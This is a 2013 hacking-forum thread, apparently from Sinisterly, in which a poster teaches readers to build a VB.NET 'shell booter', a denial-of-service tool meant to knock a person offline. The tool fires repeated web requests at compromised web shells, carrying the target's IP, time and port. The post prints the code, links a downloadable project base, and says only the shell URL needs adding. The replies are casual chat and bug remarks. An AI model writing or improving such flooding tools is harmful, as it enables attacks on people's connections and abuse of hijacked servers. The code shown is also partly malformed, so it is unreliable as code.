Sinisterly
[VB.NET]Making Easy Shell Booter - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Coding (https://sinister.ly/Forum-Coding)
+--- Forum: Visual Basic & .NET Framework (https://sinister.ly/Forum-Visual-Basic-NET-Framework)
+--- Thread: [VB.NET]Making Easy Shell Booter (/Thread-VB-NET-Making-Easy-Shell-Booter)



[VB.NET]Making Easy Shell Booter - Gingie - 07-16-2013

Ok so here's how to make a simple and easy booter.

What a booter is, is a program that takes a persons IP address and floods it with memory and such to knock them offline. Or, essentially, "booting" them offline.

The only thing that you'll need besides Visual Basic, is a Shell. I won't specify how to get shells or make them yourself, but yeah.

So start by adding a button, some textboxes(3) and some labels(3).
You can make it however you please, I just made mine small and compact.

[Image: 4zci08N.png]

So now double click the button when you have your form to look how you please. Add this coding here to it:

Code:
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim request As WebRequest = WebRequest.Create("YOUR SHELL URL HERE" + TextBox1.Text + "&time" + TextBox2.Text + "&Port=" + TextBox3.Text)
Dim request1 As WebRequest = WebRequest.Create("YOUR SHELL URL HERE" + TextBox1.Text + "&time" + TextBox2.Text + "&Port=" + TextBox3.Text)
    End Sub
End Class

Also, add system imports by going above the coding and everything and putting "Imports System.net".

To make a shell even more powerful then that, add several lines of coding to it.
Code:
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim request As WebRequest = WebRequest.Create("YOUR SHELL HERE" + TextBox1.Text + "&time" + TextBox2.Text + "&Port=" + TextBox3.Text)
Dim request1 As WebRequest = WebRequest.Create("YOUR SHELL URL HERE" + TextBox1.Text + "&time" + TextBox2.Text + "&Port=" + TextBox3.Text)
Dim request2 As WebRequest = WebRequest.Create("YOUR SHELL URL HERE" + TextBox1.Text + "&time" + TextBox2.Text + "&Port=" + TextBox3.Text)
Dim request3 As WebRequest = WebRequest.Create("YOUR SHELL URL HERE" + TextBox1.Text + "&time" + TextBox2.Text + "&Port=" + TextBox3.Text)
    End Sub
End Class

But remember, as many as you have, you have to keep adding up on the requests. So for instance your first line has "request". So your next one is "request1" so on and so forth.

Finally, you can add a message box below your coding to show that it's booting the person offline. This is easily done by adding "MsgBox("Message Here")" just below the coding.

Here's the coding when it's done:

[Image: c1w2TeO.png]

Here's the base of a booter(the project files), and all you need is to add the shell URL and you're done!

Booter Base: http://www.mediafire.com/?t79ju21p1j2iwuq
Scan(Just In Case Someone Wants): https://www.virustotal.com/en/file/5bb76815132510381a3507a4346dd953df1009a702bb5b22c5e143b1babe671e/analysis/1374000832/


This is my first tutorial for coding. How did you think it was?? I'll have bigger and better tutorials eventually lol.


RE: [VB.NET]Making Easy Shell Booter - Shebang - 07-20-2013

This assumes the shell uses those parameters, however I'm glad you used webrequests Smile


RE: [VB.NET]Making Easy Shell Booter - Gingie - 07-21-2013

True. I haven't really gotten into shell booters. This is a very basic one. And thanks shebang lol


RE: [VB.NET]Making Easy Shell Booter - Xanii - 07-27-2013

&Port != &port, just an FYI. But I also have the users put them in a list, then just replace [time] with the time and so forth.


RE: [VB.NET]Making Easy Shell Booter - Dodosky - 07-29-2013

is easy command but thank you anyway Smile some people learners dont know this Smile


RE: [VB.NET]Making Easy Shell Booter - Eternity - 07-29-2013

(07-29-2013, 12:00 PM)Dodosky Wrote: is easy command but thank you anyway Smile some people learners dont know this Smile

It's not an command o.O.


RE: [VB.NET]Making Easy Shell Booter - Dodosky - 07-29-2013

(07-29-2013, 12:16 PM)Eternity Wrote:
(07-29-2013, 12:00 PM)Dodosky Wrote: is easy command but thank you anyway Smile some people learners dont know this Smile

It's not an command o.O.

code* xD


RE: [VB.NET]Making Easy Shell Booter - Blackbone - 08-02-2013

what does a shell booter means?